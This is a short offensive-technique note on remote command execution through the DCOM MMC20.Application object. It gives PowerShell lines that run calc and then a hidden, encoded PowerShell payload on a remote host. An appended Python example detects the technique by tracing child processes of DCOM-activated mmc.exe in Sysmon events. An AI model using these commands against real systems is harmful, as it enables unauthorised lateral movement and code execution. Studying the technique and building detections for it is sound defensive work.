DCOM

The user must be a local admin

Set the $dcom variable by instantiating a remote MMC 2.0 application object on the target

$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","192.168.1.50"))

Call the ExecuteShellCommand method through the variable

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

With an actual payload

$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAGwAaQBlAG4A","7")
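On the target, remote activation of MMC20.Application starts mmc.exe as a COM server (command line ending in -Embedding, parent svchost.exe), and anything run through ExecuteShellCommand appears as a child of that mmc.exe. The hunt below is an added example, not part of the original page. It assumes Sysmon Event ID 1 records already parsed into dicts and ordered by time, and the sample events are constructed.

```python
# Added example: hunt for DCOM-activated mmc.exe spawning child processes.
# Field names follow Sysmon Event ID 1 (process creation); events are assumed
# to be already parsed into dicts and ordered by time.
from ntpath import basename

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Constructed sample events (GUIDs shortened, not real telemetry).
EVENTS = [
    # COM server started by svchost.exe: remote MMC20.Application activation
    {"ProcessGuid": "{A-01}", "ParentProcessGuid": "{S-01}",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r"C:\Windows\system32\mmc.exe -Embedding",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    # Child created through ExecuteShellCommand
    {"ProcessGuid": "{A-02}", "ParentProcessGuid": "{A-01}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe" /c calc',
     "ParentImage": r"C:\Windows\System32\mmc.exe"},
    # Benign: administrator opens Event Viewer interactively from Explorer
    {"ProcessGuid": "{B-01}", "ParentProcessGuid": "{E-01}",
     "Image": r"C:\Windows\System32\mmc.exe",
     "CommandLine": r'"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"ProcessGuid": "{B-02}", "ParentProcessGuid": "{B-01}",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'"C:\Windows\System32\cmd.exe"',
     "ParentImage": r"C:\Windows\System32\mmc.exe"},
]

def exe(path):
    """Lower-cased file name of a Windows path."""
    return basename(path).lower()

def find_dcom_mmc_children(events):
    """Return children of mmc.exe instances that were started as COM servers."""
    dcom_mmc = set()  # ProcessGuids of mmc.exe launched with -Embedding by svchost.exe
    findings = []
    for ev in events:
        if (exe(ev["Image"]) == "mmc.exe"
                and "-embedding" in ev["CommandLine"].lower()
                and exe(ev["ParentImage"]) == "svchost.exe"):
            dcom_mmc.add(ev["ProcessGuid"])
        elif ev["ParentProcessGuid"] in dcom_mmc:
            findings.append({"child": exe(ev["Image"]),
                             "command_line": ev["CommandLine"],
                             "is_shell": exe(ev["Image"]) in SHELLS})
    return findings
```

Matching on ProcessGuid rather than ProcessId avoids false links when the operating system reuses a PID.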
